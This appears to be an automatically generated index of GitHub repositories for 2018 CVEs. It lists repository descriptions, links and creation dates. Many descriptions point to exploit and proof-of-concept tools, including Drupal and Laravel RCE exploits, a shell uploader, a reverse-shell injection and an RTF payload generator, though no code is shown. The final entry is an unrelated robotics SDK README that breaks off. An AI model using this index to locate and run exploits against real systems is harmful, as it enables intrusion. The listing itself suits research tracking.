**CVE-2018-7600 POC (Drupal RCE)** : [r3dxpl0it/CVE-2018-7600](https://api.github.com/repos/r3dxpl0it/CVE-2018-7600) create time: 2018-10-23T21:47:59Z

**None** : [Wh1t3Fox/cve-2018-15473](https://api.github.com/repos/Wh1t3Fox/cve-2018-15473) create time: 2020-09-02T23:07:22Z

**Spins up an isolated test environment for experimentation with Apache Struts vulnerability CVE-2018-11776.** : [OzNetNerd/apche-struts-vuln-demo-cve-2018-11776](https://api.github.com/repos/OzNetNerd/apche-struts-vuln-demo-cve-2018-11776) create time: 2019-06-24T02:51:09Z

**This is an updated version of the CVE-2018-16763 for fuelCMS 1.4.1** : [ecebotarosh/CVE-2018-16763-exploit](https://api.github.com/repos/ecebotarosh/CVE-2018-16763-exploit) create time: 2020-09-03T15:06:22Z

**CVE-2018-13379 Script for Nmap NSE.** : [Blazz3/cve2018-13379-nmap-script](https://api.github.com/repos/Blazz3/cve2018-13379-nmap-script) create time: 2019-10-14T04:09:44Z

**None** : [kawkab101/cve-2018-6574](https://api.github.com/repos/kawkab101/cve-2018-6574) create time: 2020-09-13T04:34:58Z

**None** : [mprunet/owasp-formation-cve-2018-1270](https://api.github.com/repos/mprunet/owasp-formation-cve-2018-1270) create time: 2020-09-15T20:19:09Z

**CVE-2018-17081** : [himanshurahi/e107_2.1.9_CSRF_POC](https://api.github.com/repos/himanshurahi/e107_2.1.9_CSRF_POC) create time: 2018-09-22T09:39:26Z

**Simple poc of CVE-2018-8414 Windows Package Setting RCE Vulnerability** : [whereisr0da/CVE-2018-8414-POC](https://api.github.com/repos/whereisr0da/CVE-2018-8414-POC) create time: 2018-08-24T18:09:29Z

**Proof of consept for CVE-2018-17431** : [Fadavvi/CVE-2018-17431-PoC](https://api.github.com/repos/Fadavvi/CVE-2018-17431-PoC) create time: 2018-12-08T07:47:41Z

**None** : [lsnakazone/cve-2018-6574](https://api.github.com/repos/lsnakazone/cve-2018-6574) create time: 2020-09-27T20:08:49Z

**CVE-2018-5353** : [missing0x00/CVE-2018-5353](https://api.github.com/repos/missing0x00/CVE-2018-5353) create time: 2020-09-28T18:38:26Z

**CVE-2018-5354** : [missing0x00/CVE-2018-5354](https://api.github.com/repos/missing0x00/CVE-2018-5354) create time: 2020-09-28T20:17:50Z

**Improved DOS exploit for wordpress websites (CVE-2018-6389)** : [s0md3v/Shiva](https://api.github.com/repos/s0md3v/Shiva) create time: 2018-03-04T14:25:09Z

**None** : [ReverseBrain/CVE-2018-12421](https://api.github.com/repos/ReverseBrain/CVE-2018-12421) create time: 2020-09-30T16:02:05Z

**SAP IGS XXE attack CVE-2018-2392 and CVE-2018-2393** : [Vladimir-Ivanov-Git/sap_igs_xxe](https://api.github.com/repos/Vladimir-Ivanov-Git/sap_igs_xxe) create time: 2020-10-02T17:57:22Z

**Laravel-PHP-Unit-RCE (CVE-2018-15133) Auto Exploiter and Shell Uploader** : [Prabesh01/Laravel-PHP-Unit-RCE-Auto-shell-uploader](https://api.github.com/repos/Prabesh01/Laravel-PHP-Unit-RCE-Auto-shell-uploader) create time: 2020-04-05T04:54:40Z

**None** : [n3m1dotsys/CVE-2018-16763-Exploit-Python3](https://api.github.com/repos/n3m1dotsys/CVE-2018-16763-Exploit-Python3) create time: 2020-10-10T20:23:59Z

**Cve 2018-0208** : [dima5455/Cve-2018-0208](https://api.github.com/repos/dima5455/Cve-2018-0208) create time: 2020-10-11T10:38:41Z

**None** : [pswalia2u/CVE-2018-6574](https://api.github.com/repos/pswalia2u/CVE-2018-6574) create time: 2020-10-13T07:32:04Z

**Proof of Concept of Winbox Critical Vulnerability (CVE-2018-14847)** : [BasuCert/WinboxPoC](https://api.github.com/repos/BasuCert/WinboxPoC) create time: 2018-06-24T05:34:05Z

**Social Network Tabs Wordpress Plugin Vulnerability - CVE-2018-20555** : [fs0c131y/CVE-2018-20555](https://api.github.com/repos/fs0c131y/CVE-2018-20555) create time: 2019-01-16T14:45:44Z

**A simple POC for CVE-2018-6574** : [jongmartinez/CVE-2018-6574-POC](https://api.github.com/repos/jongmartinez/CVE-2018-6574-POC) create time: 2020-10-22T03:35:44Z

**CVE-2018-19859 Remote Code Execution Proof of Concept** : [WhiteOakSecurity/CVE-2018-19859](https://api.github.com/repos/WhiteOakSecurity/CVE-2018-19859) create time: 2020-10-22T17:05:11Z

**OpenSSH 7.7 - Username Enumeration** : [r3dxpl0it/CVE-2018-15473](https://api.github.com/repos/r3dxpl0it/CVE-2018-15473) create time: 2018-10-24T21:48:07Z

**PoC exploit for CVE-2018-11235 allowing RCE on git clone --recurse-submodules ** : [jongmartinez/CVE-2018-11235-PoC](https://api.github.com/repos/jongmartinez/CVE-2018-11235-PoC) create time: 2020-10-25T15:58:40Z

**PoC exploit for CVE-2018-11235 allowing RCE on git clone --recurse-submodules** : [Rogdham/CVE-2018-11235](https://api.github.com/repos/Rogdham/CVE-2018-11235) create time: 2018-05-30T22:56:29Z

**None** : [rockysec/CVE-2018-11236](https://api.github.com/repos/rockysec/CVE-2018-11236) create time: 2020-10-30T00:13:53Z

**None** : [Yashrk078/Test_CVE-2018-6574](https://api.github.com/repos/Yashrk078/Test_CVE-2018-6574) create time: 2020-11-03T10:47:24Z

**None** : [mhamed366/CVE-2018-6574](https://api.github.com/repos/mhamed366/CVE-2018-6574) create time: 2020-03-19T15:09:11Z

**None** : [pwn3z/CVE-2018-13379-FortinetVPN](https://api.github.com/repos/pwn3z/CVE-2018-13379-FortinetVPN) create time: 2020-09-17T18:00:11Z

**(CVE-2019-6340, CVE-2018-7600) drupal8-REST-RCE ** : [ludy-dev/drupal8-REST-RCE](https://api.github.com/repos/ludy-dev/drupal8-REST-RCE) create time: 2020-08-31T22:55:18Z

**None** : [azzzzzzzzzzzzzzzzz/CVE-2018-6574](https://api.github.com/repos/azzzzzzzzzzzzzzzzz/CVE-2018-6574) create time: 2020-11-11T09:34:22Z

**generate RTF exploit payload. uses cve-2017-11882, cve-2017-8570, cve-2018-0802, and cve-2018-8174.** : [dcsync/rtfkit](https://api.github.com/repos/dcsync/rtfkit) create time: 2020-11-16T22:21:54Z

**TPM vulnerability checking tool for CVE-2018-6622. This tool will be published at Black Hat Asia 2019 and Black Hat Europe 2019** : [kkamagui/napper-for-tpm](https://api.github.com/repos/kkamagui/napper-for-tpm) create time: 2019-02-07T06:45:27Z

**FortiVuln** : [k4nfr3/CVE-2018-13379-Fortinet](https://api.github.com/repos/k4nfr3/CVE-2018-13379-Fortinet) create time: 2020-11-19T21:22:25Z

**DHCP exploitation with DynoRoot (CVE-2018-1111)** : [baldassarreFe/FEP3370-advanced-ethical-hacking](https://api.github.com/repos/baldassarreFe/FEP3370-advanced-ethical-hacking) create time: 2020-11-17T19:10:29Z

**None** : [www201001/https-github.com-iBearcat-CVE-2018-8174_EXP](https://api.github.com/repos/www201001/https-github.com-iBearcat-CVE-2018-8174_EXP) create time: 2020-11-24T07:31:07Z

**None** : [www201001/https-github.com-iBearcat-CVE-2018-8174_EXP.git-](https://api.github.com/repos/www201001/https-github.com-iBearcat-CVE-2018-8174_EXP.git-) create time: 2020-11-24T07:32:39Z

**OpenSSH < 7.7 User Enumeration CVE-2018-15473 Exploit** : [pyperanger/CVE-2018-15473_exploit](https://api.github.com/repos/pyperanger/CVE-2018-15473_exploit) create time: 2018-10-08T20:59:04Z

**None** : [1stPeak/CVE-2018-15473](https://api.github.com/repos/1stPeak/CVE-2018-15473) create time: 2020-11-23T13:50:56Z

**openssh<7.7 用户名枚举** : [coollce/CVE-2018-15473_burte](https://api.github.com/repos/coollce/CVE-2018-15473_burte) create time: 2020-11-26T05:17:08Z

**None** : [Dirty-Racoon/CVE-2018-15473-py3](https://api.github.com/repos/Dirty-Racoon/CVE-2018-15473-py3) create time: 2020-11-27T12:25:41Z

**weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14882、CVE-2020-14883** : [0xn0ne/weblogicScanner](https://api.github.com/repos/0xn0ne/weblogicScanner) create time: 2020-01-15T04:26:29Z

**This repo has a blog post about my analysis for CVE-2018-19987 an authenticated OS command injection affecting multiple D-Link routers** : [nahueldsanchez/blogpost_cve-2018-19987-analysis](https://api.github.com/repos/nahueldsanchez/blogpost_cve-2018-19987-analysis) create time: 2020-11-19T23:01:11Z

**CVE-2018-20966: XSS in woocommerce-jetpack < 3.8.0** : [parzel/CVE-2018-20966](https://api.github.com/repos/parzel/CVE-2018-20966) create time: 2020-11-28T19:08:43Z

**OpenSSH 2.3 < 7.7 - Username Enumeration** : [Sait-Nuri/CVE-2018-15473](https://api.github.com/repos/Sait-Nuri/CVE-2018-15473) create time: 2020-11-29T17:36:11Z

**None** : [wikiZ/cve-2018-8120](https://api.github.com/repos/wikiZ/cve-2018-8120) create time: 2020-11-30T23:28:32Z

**None** : [ossf-cve-benchmark/CVE-2018-1000096](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-1000096) create time: 2020-12-01T07:49:09Z

**None** : [ossf-cve-benchmark/CVE-2018-8035](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-8035) create time: 2020-11-02T20:54:14Z

**None** : [ossf-cve-benchmark/CVE-2018-1002204](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-1002204) create time: 2020-12-01T08:06:10Z

**None** : [ossf-cve-benchmark/CVE-2018-11615](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-11615) create time: 2020-12-01T08:06:10Z

**None** : [ossf-cve-benchmark/CVE-2018-1002203](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-1002203) create time: 2020-12-01T08:06:10Z

**None** : [ossf-cve-benchmark/CVE-2018-1000620](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-1000620) create time: 2020-12-01T08:06:10Z

**None** : [ossf-cve-benchmark/CVE-2018-11093](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-11093) create time: 2020-12-01T08:06:10Z

**None** : [ossf-cve-benchmark/CVE-2018-1000086](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-1000086) create time: 2020-12-01T08:06:10Z

**None** : [ossf-cve-benchmark/CVE-2018-11798](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-11798) create time: 2020-12-01T08:06:10Z

**None** : [ossf-cve-benchmark/CVE-2018-13797](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-13797) create time: 2020-12-01T08:06:10Z

**None** : [ossf-cve-benchmark/CVE-2018-14380](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-14380) create time: 2020-12-01T08:06:10Z

**None** : [ossf-cve-benchmark/CVE-2018-13863](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-13863) create time: 2020-12-01T08:06:10Z

**None** : [ossf-cve-benchmark/CVE-2018-14041](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-14041) create time: 2020-12-01T08:06:10Z

**None** : [ossf-cve-benchmark/CVE-2018-16480](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-16480) create time: 2020-12-01T08:06:10Z

**None** : [ossf-cve-benchmark/CVE-2018-16461](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-16461) create time: 2020-12-01T08:06:10Z

**None** : [ossf-cve-benchmark/CVE-2018-16462](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-16462) create time: 2020-12-01T08:06:10Z

**None** : [ossf-cve-benchmark/CVE-2018-14042](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-14042) create time: 2020-12-01T08:06:10Z

**None** : [ossf-cve-benchmark/CVE-2018-16472](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-16472) create time: 2020-12-01T08:06:10Z

**None** : [ossf-cve-benchmark/CVE-2018-14040](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-14040) create time: 2020-12-01T08:06:10Z

**None** : [ossf-cve-benchmark/CVE-2018-16479](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-16479) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-16490](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-16490) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-16491](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-16491) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-18282](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-18282) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-16485](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-16485) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-16460](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-16460) create time: 2020-12-01T08:06:10Z

**None** : [ossf-cve-benchmark/CVE-2018-16489](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-16489) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-16492](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-16492) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-16487](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-16487) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-16484](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-16484) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-20164](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-20164) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-20676](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-20676) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-19048](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-19048) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3718](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3718) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-20677](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-20677) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-20834](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-20834) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-20835](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-20835) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-20801](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-20801) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3719](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3719) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3712](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3712) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-21036](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-21036) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3721](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3721) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3722](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3722) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3731](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3731) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3733](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3733) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3728](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3728) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3736](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3736) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3726](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3726) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3738](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3738) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3747](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3747) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3743](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3743) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3750](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3750) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3732](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3732) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3737](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3737) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3746](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3746) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3770](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3770) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-16478](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-16478) create time: 2020-12-01T08:06:10Z

**None** : [ossf-cve-benchmark/CVE-2018-3752](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3752) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3786](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3786) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-6184](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-6184) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-6333](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-6333) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-6342](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-6342) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-7651](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-7651) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3783](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3783) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-7560](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-7560) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3772](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3772) create time: 2020-12-01T08:06:11Z

**CVE-2018-9276 PRTG < 18.2.39 Authenticated Command Injection (Reverse Shell)** : [wildkindcc/CVE-2018-9276](https://api.github.com/repos/wildkindcc/CVE-2018-9276) create time: 2019-03-31T08:51:07Z

**An automated PoC for CVE 2018-15133** : [AlienX2001/better-poc-for-CVE-2018-15133](https://api.github.com/repos/AlienX2001/better-poc-for-CVE-2018-15133) create time: 2020-11-09T08:44:27Z

**Analisis y descripcion de una vulnerabilidad que afecta a Drupal (CVE 2018-7600). Trabajo realizado para la asignatura Seguridad en Sistemas Informáticos.** : [VictorMora97/Drupalgeddon2](https://api.github.com/repos/VictorMora97/Drupalgeddon2) create time: 2020-12-06T12:29:44Z

**None** : [ossf-cve-benchmark/CVE-2018-3713](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3713) create time: 2020-12-01T12:24:58Z

**None** : [ossf-cve-benchmark/CVE-2018-3725](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3725) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-3757](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-3757) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2018-6341](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-6341) create time: 2020-12-01T08:06:11Z

**Ladon Scanner For Python, Large Network Penetration Scanner & Cobalt Strike, vulnerability / exploit / detection / MS17010/SmbGhost/CVE-2020-0796/CVE-2018-2894** : [k8gege/PyLadon](https://api.github.com/repos/k8gege/PyLadon) create time: 2019-11-19T16:51:39Z

**None** : [WildfootW/CVE-2018-15473_OpenSSH_7.7](https://api.github.com/repos/WildfootW/CVE-2018-15473_OpenSSH_7.7) create time: 2020-12-09T15:09:31Z

**version between CVE-2018-20433 and CVE-2019-5427** : [shanika04/cp30_XXE_partial_fix](https://api.github.com/repos/shanika04/cp30_XXE_partial_fix) create time: 2020-12-13T12:08:30Z

**Fortinet FortiOS路径遍历漏洞 (CVE-2018-13379)批量检测脚本** : [B1anda0/CVE-2018-13379](https://api.github.com/repos/B1anda0/CVE-2018-13379) create time: 2020-12-14T12:17:03Z

**None** : [FilipeFraqueiro/CVE-2018-6574](https://api.github.com/repos/FilipeFraqueiro/CVE-2018-6574) create time: 2020-12-17T16:09:07Z

**None** : [shadofren/CVE-2018-6574](https://api.github.com/repos/shadofren/CVE-2018-6574) create time: 2020-12-21T14:01:41Z

**None** : [NikolaT3sla/cve-2018-6574](https://api.github.com/repos/NikolaT3sla/cve-2018-6574) create time: 2020-12-22T20:50:06Z

**Laravel RCE exploit. CVE-2018-15133** : [PwnedShell/Larascript](https://api.github.com/repos/PwnedShell/Larascript) create time: 2020-12-21T22:02:08Z

**based on nginx 1.19.5 to fix for CVE-2018-16843, CVE-2018-16844, CVE-2019-9511, CVE-2019-9513, and CVE-2019-9516** : [flyniu666/ingress-nginx-0.21-1.19.5](https://api.github.com/repos/flyniu666/ingress-nginx-0.21-1.19.5) create time: 2020-12-22T10:16:11Z

**None** : [vishack/CVE-2018-6574](https://api.github.com/repos/vishack/CVE-2018-6574) create time: 2020-12-29T12:27:06Z

**None** : [PLP-Orange/cve-2018-6574-exercise](https://api.github.com/repos/PLP-Orange/cve-2018-6574-exercise) create time: 2020-12-31T10:57:21Z

**Exploit for Laravel Remote Code Execution with API_KEY (CVE-2018-15133)** : [aljavier/exploit_laravel_cve-2018-15133](https://api.github.com/repos/aljavier/exploit_laravel_cve-2018-15133) create time: 2020-11-13T16:33:52Z

**None** : [AndyFeiLi/CVE-2018-9276](https://api.github.com/repos/AndyFeiLi/CVE-2018-9276) create time: 2021-01-02T09:08:42Z

**python2.7 script for JWT generation** : [Eremiel/CVE-2018-0114](https://api.github.com/repos/Eremiel/CVE-2018-0114) create time: 2021-01-03T21:12:10Z

**None** : [dsp-testing/CVE-2018-16492](https://api.github.com/repos/dsp-testing/CVE-2018-16492) create time: 2021-01-05T14:44:09Z

**None** : [dsp-testing/CVE-2018-13797](https://api.github.com/repos/dsp-testing/CVE-2018-13797) create time: 2021-01-05T18:56:56Z

**PoC + Docker Environment for Python PIL/Pillow Remote Shell Command Execution via Ghostscript CVE-2018-16509** : [farisv/PIL-RCE-Ghostscript-CVE-2018-16509](https://api.github.com/repos/farisv/PIL-RCE-Ghostscript-CVE-2018-16509) create time: 2018-10-15T07:44:43Z

**None** : [AzhariKun/CVE-2018-15133](https://api.github.com/repos/AzhariKun/CVE-2018-15133) create time: 2021-01-03T08:06:46Z

**Exploit for Drupal v7.x + v8.x (Drupalgeddon 2 / CVE-2018-7600 / SA-CORE-2018-002)** : [dreadlocked/Drupalgeddon2](https://api.github.com/repos/dreadlocked/Drupalgeddon2) create time: 2018-04-12T22:53:14Z

**None** : [purgedemo/CVE-2018-6574](https://api.github.com/repos/purgedemo/CVE-2018-6574) create time: 2021-01-11T01:55:54Z

**None** : [purgedemo/CVE-2018-6574_2](https://api.github.com/repos/purgedemo/CVE-2018-6574_2) create time: 2021-01-11T02:16:19Z

**None** : [Starry-lord/CVE-2018-0114](https://api.github.com/repos/Starry-lord/CVE-2018-0114) create time: 2021-01-13T17:40:08Z

**Rust implementation of CVE-2018-16763 with some extra features.** : [uwueviee/Fu3l-F1lt3r](https://api.github.com/repos/uwueviee/Fu3l-F1lt3r) create time: 2021-01-15T20:09:09Z

**CENG 325 - Principles of Information Security And Privacy** : [canumay/cve-2018-1335](https://api.github.com/repos/canumay/cve-2018-1335) create time: 2021-01-18T19:01:50Z

**Rust implementation of the Fusée Gelée exploit (CVE-2018-6242) for Tegra processors.** : [austinhartzheim/fusee-gelee](https://api.github.com/repos/austinhartzheim/fusee-gelee) create time: 2020-09-07T03:28:15Z

**Quick and dirty bruteforcer for CVE-2018-7669 (Directory Traversal Vulnerability in Sitecore)** : [palaziv/CVE-2018-7669](https://api.github.com/repos/palaziv/CVE-2018-7669) create time: 2021-01-25T10:13:32Z

**RF-14310 / CVE-2018-12533 - Payload generator ** : [TheKalin/CVE-2018-12533](https://api.github.com/repos/TheKalin/CVE-2018-12533) create time: 2018-12-15T09:08:53Z

**Fixed version of the Python script to exploit CVE-2018-19571 and CVE-2018-19585 (GitLab 11.4.7 - Authenticated Remote Code Execution) that is available at https://www.exploit-db.com/exploits/49263 (Python 3.9).** : [xenophil90/edb-49263-fixed](https://api.github.com/repos/xenophil90/edb-49263-fixed) create time: 2021-02-08T07:38:09Z

**None** : [forse01/CVE-2018-1000542-NetBeans](https://api.github.com/repos/forse01/CVE-2018-1000542-NetBeans) create time: 2021-02-04T00:01:33Z

**POC CVE-2018-14714** : [tin-z/CVE-2018-14714-POC](https://api.github.com/repos/tin-z/CVE-2018-14714-POC) create time: 2020-04-25T03:43:44Z

**None** : [Yealid/CVE-2018-6574](https://api.github.com/repos/Yealid/CVE-2018-6574) create time: 2021-02-14T14:59:24Z

**None** : [vhok74/cve-2018-3295](https://api.github.com/repos/vhok74/cve-2018-3295) create time: 2020-10-25T07:33:29Z

**None** : [roninAPT/CVE-2018-0802](https://api.github.com/repos/roninAPT/CVE-2018-0802) create time: 2021-02-20T02:34:16Z

**POC for CVE-2018-0114 written in Go** : [adityathebe/POC-CVE-2018-0114](https://api.github.com/repos/adityathebe/POC-CVE-2018-0114) create time: 2020-12-20T09:29:35Z

**The exploit python script for CVE-2018-7600** : [madneal/codeql-scanner](https://api.github.com/repos/madneal/codeql-scanner) create time: 2019-03-15T08:24:27Z

**This module massively scan and exploit a path traversal vulnerability in the FortiOS SSL VPN web portal may allow an unauthenticated attacker to download FortiOS system files through specially crafted HTTP resource requests (CVE-2018-13379).** : [Zeop-CyberSec/fortios_vpnssl_traversal_leak](https://api.github.com/repos/Zeop-CyberSec/fortios_vpnssl_traversal_leak) create time: 2020-11-30T08:39:05Z

**None** : [killtr0/POC-CVE-2018-6574](https://api.github.com/repos/killtr0/POC-CVE-2018-6574) create time: 2021-03-07T02:45:41Z

**A working PoC to CVE-2018-16763 ** : [shoamshilo/Fuel-CMS-Remote-Code-Execution-1.4--RCE--](https://api.github.com/repos/shoamshilo/Fuel-CMS-Remote-Code-Execution-1.4--RCE--) create time: 2021-03-07T14:57:13Z

**NOTICE This repository contains the public FTC SDK for the SKYSTONE (2019-2020) competition season. If you are looking for the current season's FTC SDK software, please visit the new and permanent home of the public FTC SDK: FtcRobotController repository Welcome! This GitHub repository contains the source code that is used to build an Android app to control a FIRST Tech Challenge competition robot. To use this SDK, download/clone the entire project to your local computer. Getting Started If you are new to robotics or new to the FIRST Tech Challenge, then you should consider reviewing the FTC Blocks Tutorial to get familiar with how to use the control system: FTC Blocks Online Tutorial Even if you are an advanced Java programmer, it is helpful to start with the FTC Blocks tutorial, and then migrate to the OnBot Java Tool or to Android Studio afterwards. Downloading the Project If you are an Android Studio programmer, there are several ways to download this repo. Note that if you use the Blocks or OnBot Java Tool to program your robot, then you do not need to download this repository. If you are a git user, you can clone the most current version of the repository: git clone https://github.com/FIRST-Tech-Challenge/SKYSTONE.git Or, if you prefer, you can use the "Download Zip" button available through the main repository page. Downloading the project as a .ZIP file will keep the size of the download manageable. You can also download the project folder (as a .zip or .tar.gz archive file) from the Downloads subsection of the Releases page for this repository. Once you have downloaded and uncompressed (if needed) your folder, you can use Android Studio to import the folder ("Import project (Eclipse ADT, Gradle, etc.)"). Getting Help User Documentation and Tutorials FIRST maintains online documentation with information and tutorials on how to use the FIRST Tech Challenge software and robot control system. You can access this documentation using the following link: SKYSTONE Online Documentation Note that the online documentation is an "evergreen" document that is constantly being updated and edited. It contains the most current information about the FIRST Tech Challenge software and control system. Javadoc Reference Material The Javadoc reference documentation for the FTC SDK is now available online. Click on the following link to view the FTC SDK Javadoc documentation as a live website: FTC Javadoc Documentation Documentation for the FTC SDK is also included with this repository. There is a subfolder called "doc" which contains several subfolders: The folder "apk" contains the .apk files for the FTC Driver Station and FTC Robot Controller apps. The folder "javadoc" contains the JavaDoc user documentation for the FTC SDK. Online User Forum For technical questions regarding the Control System or the FTC SDK, please visit the FTC Technology forum: FTC Technology Forum Release Information Version 5.5 (20200824-090813) Version 5.5 requires Android Studio 4.0 or later. New features Adds support for calling custom Java classes from Blocks OpModes (fixes SkyStone issue #161). Classes must be in the org.firstinspires.ftc.teamcode package. Methods must be public static and have no more than 21 parameters. Parameters declared as OpMode, LinearOpMode, Telemetry, and HardwareMap are supported and the argument is provided automatically, regardless of the order of the parameters. On the 